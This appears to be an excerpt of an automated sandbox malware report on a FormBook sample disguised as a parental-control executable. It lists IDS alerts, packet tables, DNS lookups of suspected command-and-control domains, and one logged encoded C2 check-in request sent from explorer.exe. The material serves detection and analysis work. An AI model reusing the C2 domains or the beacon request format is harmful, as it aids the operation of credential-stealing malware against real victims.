                                                                    RT_MANIFEST0xa2cb00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2019
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameI.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyName
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameMultiUserParentalControl
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionMultiUserParentalControl
                                                                    OriginalFilenameI.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    01/13/21-20:48:24.834046TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.334.102.136.180
                                                                    01/13/21-20:48:24.834046TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.334.102.136.180
                                                                    01/13/21-20:48:24.834046TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.334.102.136.180
                                                                    01/13/21-20:48:24.972837TCP1201ATTACK-RESPONSES 403 Forbidden804972934.102.136.180192.168.2.3
                                                                    01/13/21-20:48:56.452844TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                    01/13/21-20:48:56.452844TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                    01/13/21-20:48:56.452844TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.334.102.136.180
                                                                    01/13/21-20:48:56.592288TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.3
                                                                    01/13/21-20:49:33.772040TCP1201ATTACK-RESPONSES 403 Forbidden804974734.102.136.180192.168.2.3
                                                                    01/13/21-20:49:52.606588TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.334.102.136.180
                                                                    01/13/21-20:49:52.606588TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.334.102.136.180
                                                                    01/13/21-20:49:52.606588TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.334.102.136.180
                                                                    01/13/21-20:49:52.745198TCP1201ATTACK-RESPONSES 403 Forbidden804974934.102.136.180192.168.2.3
                                                                    01/13/21-20:50:26.900142TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.334.102.136.180
                                                                    01/13/21-20:50:26.900142TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.334.102.136.180
                                                                    01/13/21-20:50:26.900142TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.334.102.136.180
                                                                    01/13/21-20:50:27.039673TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.3

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 13, 2021 20:48:16.321661949 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:16.507045984 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:16.509676933 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.321662903 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.504669905 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:19.504873037 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.505085945 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.687851906 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:19.726598978 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:19.726627111 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:19.726881981 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.726911068 CET4972880192.168.2.3184.168.131.241
                                                                    Jan 13, 2021 20:48:19.912086964 CET8049728184.168.131.241192.168.2.3
                                                                    Jan 13, 2021 20:48:24.793709993 CET4972980192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:24.833543062 CET804972934.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:24.833862066 CET4972980192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:24.834045887 CET4972980192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:24.873786926 CET804972934.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:24.972836971 CET804972934.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:24.972860098 CET804972934.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:24.973002911 CET4972980192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:24.973104000 CET4972980192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:25.013106108 CET804972934.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:30.072020054 CET4973180192.168.2.337.48.65.150
                                                                    Jan 13, 2021 20:48:30.122785091 CET804973137.48.65.150192.168.2.3
                                                                    Jan 13, 2021 20:48:30.122970104 CET4973180192.168.2.337.48.65.150
                                                                    Jan 13, 2021 20:48:30.123297930 CET4973180192.168.2.337.48.65.150
                                                                    Jan 13, 2021 20:48:30.173950911 CET804973137.48.65.150192.168.2.3
                                                                    Jan 13, 2021 20:48:30.411103010 CET804973137.48.65.150192.168.2.3
                                                                    Jan 13, 2021 20:48:30.411618948 CET4973180192.168.2.337.48.65.150
                                                                    Jan 13, 2021 20:48:30.411705017 CET804973137.48.65.150192.168.2.3
                                                                    Jan 13, 2021 20:48:30.411809921 CET4973180192.168.2.337.48.65.150
                                                                    Jan 13, 2021 20:48:30.462523937 CET804973137.48.65.150192.168.2.3
                                                                    Jan 13, 2021 20:48:45.834404945 CET4974080192.168.2.354.208.77.124
                                                                    Jan 13, 2021 20:48:45.960352898 CET804974054.208.77.124192.168.2.3
                                                                    Jan 13, 2021 20:48:45.960441113 CET4974080192.168.2.354.208.77.124
                                                                    Jan 13, 2021 20:48:45.960675955 CET4974080192.168.2.354.208.77.124
                                                                    Jan 13, 2021 20:48:46.088377953 CET804974054.208.77.124192.168.2.3
                                                                    Jan 13, 2021 20:48:46.088632107 CET4974080192.168.2.354.208.77.124
                                                                    Jan 13, 2021 20:48:46.088660955 CET4974080192.168.2.354.208.77.124
                                                                    Jan 13, 2021 20:48:46.214675903 CET804974054.208.77.124192.168.2.3
                                                                    Jan 13, 2021 20:48:51.205455065 CET4974180192.168.2.3135.181.31.212
                                                                    Jan 13, 2021 20:48:51.270143986 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:51.270278931 CET4974180192.168.2.3135.181.31.212
                                                                    Jan 13, 2021 20:48:51.270602942 CET4974180192.168.2.3135.181.31.212
                                                                    Jan 13, 2021 20:48:51.335372925 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:51.336184025 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:51.336205006 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:51.336220026 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:51.336554050 CET4974180192.168.2.3135.181.31.212
                                                                    Jan 13, 2021 20:48:51.336566925 CET4974180192.168.2.3135.181.31.212
                                                                    Jan 13, 2021 20:48:51.401350021 CET8049741135.181.31.212192.168.2.3
                                                                    Jan 13, 2021 20:48:56.412378073 CET4974280192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:56.452491045 CET804974234.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:56.452590942 CET4974280192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:56.452843904 CET4974280192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:56.492774963 CET804974234.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:56.592288017 CET804974234.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:56.592327118 CET804974234.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:48:56.592566967 CET4974280192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:56.592669010 CET4974280192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:48:56.632766962 CET804974234.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:49:01.842854977 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.043056011 CET8049743104.233.238.207192.168.2.3
                                                                    Jan 13, 2021 20:49:02.043153048 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.043426037 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.244457006 CET8049743104.233.238.207192.168.2.3
                                                                    Jan 13, 2021 20:49:02.244515896 CET8049743104.233.238.207192.168.2.3
                                                                    Jan 13, 2021 20:49:02.244632959 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.444785118 CET8049743104.233.238.207192.168.2.3
                                                                    Jan 13, 2021 20:49:02.445784092 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.445930958 CET4974380192.168.2.3104.233.238.207
                                                                    Jan 13, 2021 20:49:02.645844936 CET8049743104.233.238.207192.168.2.3
                                                                    Jan 13, 2021 20:49:07.568334103 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:07.642817974 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:07.642911911 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:07.643075943 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:07.717680931 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:08.154499054 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:08.269041061 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570158958 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570198059 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570224047 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570242882 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570260048 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570275068 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570290089 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570305109 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570384026 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570389032 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:09.570430994 CET8049744195.78.66.137192.168.2.3
                                                                    Jan 13, 2021 20:49:09.570456982 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:09.570513964 CET4974480192.168.2.3195.78.66.137
                                                                    Jan 13, 2021 20:49:33.592503071 CET4974780192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:49:33.632606030 CET804974734.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:49:33.632725000 CET4974780192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:49:33.632935047 CET4974780192.168.2.334.102.136.180
                                                                    Jan 13, 2021 20:49:33.672928095 CET804974734.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:49:33.772039890 CET804974734.102.136.180192.168.2.3
                                                                    Jan 13, 2021 20:49:33.772070885 CET804974734.102.136.180192.168.2.3

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 13, 2021 20:47:20.163229942 CET5754453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:20.211036921 CET53575448.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:21.107830048 CET5598453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:21.158705950 CET53559848.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:22.038727045 CET6418553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:22.095300913 CET53641858.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:23.300674915 CET6511053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:23.348737955 CET53651108.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:24.260226011 CET5836153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:24.316452026 CET53583618.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:25.244940996 CET6349253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:25.295751095 CET53634928.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:26.340733051 CET6083153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:26.391526937 CET53608318.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:27.463809967 CET6010053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:27.514486074 CET53601008.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:28.940273046 CET5319553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:28.988276005 CET53531958.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:29.887504101 CET5014153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:29.938234091 CET53501418.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:40.247060061 CET5302353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:40.295018911 CET53530238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:42.273008108 CET4956353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:42.320925951 CET53495638.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:44.671813965 CET5135253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:44.728101969 CET53513528.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:45.629502058 CET5934953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:45.677798033 CET53593498.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:46.589325905 CET5708453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:46.637273073 CET53570848.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:47:47.681009054 CET5882353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:47:47.739073992 CET53588238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:00.193825006 CET5756853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:00.241695881 CET53575688.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:09.734285116 CET5054053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:09.793548107 CET53505408.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:09.890402079 CET5436653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:09.938431978 CET53543668.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:12.204257965 CET5303453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:12.262058020 CET53530348.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:16.251451969 CET5776253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:16.312657118 CET53577628.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:24.732445955 CET5543553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:24.792561054 CET53554358.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:28.878324986 CET5071353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:28.929086924 CET53507138.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:29.987207890 CET5613253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:30.069827080 CET53561328.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:35.444365978 CET5898753192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:35.509836912 CET53589878.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:37.973656893 CET5657953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:38.021651983 CET53565798.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:40.518562078 CET6063353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:40.723067999 CET53606338.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:42.083743095 CET6129253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:42.141818047 CET53612928.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:45.746731043 CET6361953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:45.832438946 CET53636198.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:51.125051975 CET6493853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:51.204478979 CET53649388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:48:56.346642017 CET6194653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:48:56.410253048 CET53619468.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:01.614154100 CET6491053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:01.841878891 CET53649108.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:07.481575012 CET5212353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:07.567187071 CET53521238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:13.174890995 CET5613053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:13.253691912 CET53561308.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:13.601075888 CET5633853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:13.649050951 CET53563388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:14.937787056 CET5942053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:14.994203091 CET53594208.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:18.276005030 CET5878453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:18.352054119 CET53587848.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:28.418977022 CET6397853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:28.509651899 CET53639788.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:33.521580935 CET6293853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:33.591161013 CET53629388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:49:38.785815001 CET5570853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:49:39.095535040 CET53557088.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:03.019531965 CET5680353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:03.076298952 CET53568038.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:08.083200932 CET5714553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:08.322495937 CET53571458.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:09.690120935 CET5535953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:09.749203920 CET53553598.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:10.399548054 CET5830653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:10.456119061 CET53583068.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:11.136198044 CET6412453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:11.199878931 CET53641248.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:11.707850933 CET4936153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:11.755697012 CET53493618.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:12.352400064 CET6315053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:12.400408983 CET53631508.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:13.165945053 CET5327953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:13.225104094 CET53532798.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:14.024653912 CET5688153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:14.072810888 CET53568818.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:14.967556000 CET5364253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:15.024226904 CET53536428.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:16.159085989 CET5566753192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:16.210145950 CET53556678.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:16.814532995 CET5483353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:16.862567902 CET53548338.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:43.243957996 CET6247653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:43.302779913 CET53624768.8.8.8192.168.2.3
                                                                    Jan 13, 2021 20:50:48.316194057 CET4970553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 20:50:48.372716904 CET53497058.8.8.8192.168.2.3

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jan 13, 2021 20:48:16.251451969 CET192.168.2.38.8.8.80xafbdStandard query (0)www.100feetpics.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:24.732445955 CET192.168.2.38.8.8.80x9ceeStandard query (0)www.reversehomeloansmiami.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:29.987207890 CET192.168.2.38.8.8.80xca5bStandard query (0)www.tomatrader.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:35.444365978 CET192.168.2.38.8.8.80xf23bStandard query (0)www.jizhoujsp.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:40.518562078 CET192.168.2.38.8.8.80x3009Standard query (0)www.8million-lr.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:45.746731043 CET192.168.2.38.8.8.80x6ad5Standard query (0)www.futbolclubbarcelona.soccerA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:51.125051975 CET192.168.2.38.8.8.80x6fb0Standard query (0)www.ondesign03.netA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:56.346642017 CET192.168.2.38.8.8.80xbac8Standard query (0)www.crafteest.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:01.614154100 CET192.168.2.38.8.8.80x67b8Standard query (0)www.4037a.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:07.481575012 CET192.168.2.38.8.8.80x7034Standard query (0)www.puzelhome.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:13.174890995 CET192.168.2.38.8.8.80xaecbStandard query (0)www.tootleshook.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:18.276005030 CET192.168.2.38.8.8.80xec80Standard query (0)www.hechoenvegas.netA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:28.418977022 CET192.168.2.38.8.8.80xc7a7Standard query (0)www.jorgegiljewelry.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:33.521580935 CET192.168.2.38.8.8.80x68a0Standard query (0)www.bodyfuelrtd.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:38.785815001 CET192.168.2.38.8.8.80xf53cStandard query (0)www.amazon-support-recovery.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:03.019531965 CET192.168.2.38.8.8.80x7467Standard query (0)www.jizhoujsp.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:08.083200932 CET192.168.2.38.8.8.80xf535Standard query (0)www.8million-lr.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:43.243957996 CET192.168.2.38.8.8.80x7ff7Standard query (0)www.tootleshook.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:48.316194057 CET192.168.2.38.8.8.80x59e4Standard query (0)www.hechoenvegas.netA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jan 13, 2021 20:48:16.312657118 CET8.8.8.8192.168.2.30xafbdNo error (0)www.100feetpics.com100feetpics.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 20:48:16.312657118 CET8.8.8.8192.168.2.30xafbdNo error (0)100feetpics.com184.168.131.241A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:16.312657118 CET8.8.8.8192.168.2.30xafbdNo error (0)100feetpics.com213.32.7.131A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:24.792561054 CET8.8.8.8192.168.2.30x9ceeNo error (0)www.reversehomeloansmiami.comreversehomeloansmiami.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 20:48:24.792561054 CET8.8.8.8192.168.2.30x9ceeNo error (0)reversehomeloansmiami.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:30.069827080 CET8.8.8.8192.168.2.30xca5bNo error (0)www.tomatrader.com37.48.65.150A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:35.509836912 CET8.8.8.8192.168.2.30xf23bName error (3)www.jizhoujsp.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:40.723067999 CET8.8.8.8192.168.2.30x3009Server failure (2)www.8million-lr.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:45.832438946 CET8.8.8.8192.168.2.30x6ad5No error (0)www.futbolclubbarcelona.soccer54.208.77.124A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:45.832438946 CET8.8.8.8192.168.2.30x6ad5No error (0)www.futbolclubbarcelona.soccer34.206.12.234A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:45.832438946 CET8.8.8.8192.168.2.30x6ad5No error (0)www.futbolclubbarcelona.soccer35.169.58.188A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:51.204478979 CET8.8.8.8192.168.2.30x6fb0No error (0)www.ondesign03.net135.181.31.212A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:48:56.410253048 CET8.8.8.8192.168.2.30xbac8No error (0)www.crafteest.comcrafteest.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 20:48:56.410253048 CET8.8.8.8192.168.2.30xbac8No error (0)crafteest.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:01.841878891 CET8.8.8.8192.168.2.30x67b8No error (0)www.4037a.com104.233.238.207A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:07.567187071 CET8.8.8.8192.168.2.30x7034No error (0)www.puzelhome.com195.78.66.137A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:13.253691912 CET8.8.8.8192.168.2.30xaecbName error (3)www.tootleshook.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:18.352054119 CET8.8.8.8192.168.2.30xec80Name error (3)www.hechoenvegas.netnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:28.509651899 CET8.8.8.8192.168.2.30xc7a7Name error (3)www.jorgegiljewelry.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:33.591161013 CET8.8.8.8192.168.2.30x68a0No error (0)www.bodyfuelrtd.combodyfuelrtd.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 20:49:33.591161013 CET8.8.8.8192.168.2.30x68a0No error (0)bodyfuelrtd.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:49:39.095535040 CET8.8.8.8192.168.2.30xf53cServer failure (2)www.amazon-support-recovery.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:03.076298952 CET8.8.8.8192.168.2.30x7467Name error (3)www.jizhoujsp.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:08.322495937 CET8.8.8.8192.168.2.30xf535Server failure (2)www.8million-lr.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:43.302779913 CET8.8.8.8192.168.2.30x7ff7Name error (3)www.tootleshook.comnonenoneA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 20:50:48.372716904 CET8.8.8.8192.168.2.30x59e4Name error (3)www.hechoenvegas.netnonenoneA (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.100feetpics.com
                                                                    • www.reversehomeloansmiami.com
                                                                    • www.tomatrader.com
                                                                    • www.futbolclubbarcelona.soccer
                                                                    • www.ondesign03.net
                                                                    • www.crafteest.com
                                                                    • www.4037a.com
                                                                    • www.puzelhome.com
                                                                    • www.bodyfuelrtd.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.349728184.168.131.24180C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 13, 2021 20:48:19.505085945 CET992OUTGET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1
                                                                    Host: www.100feetpics.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
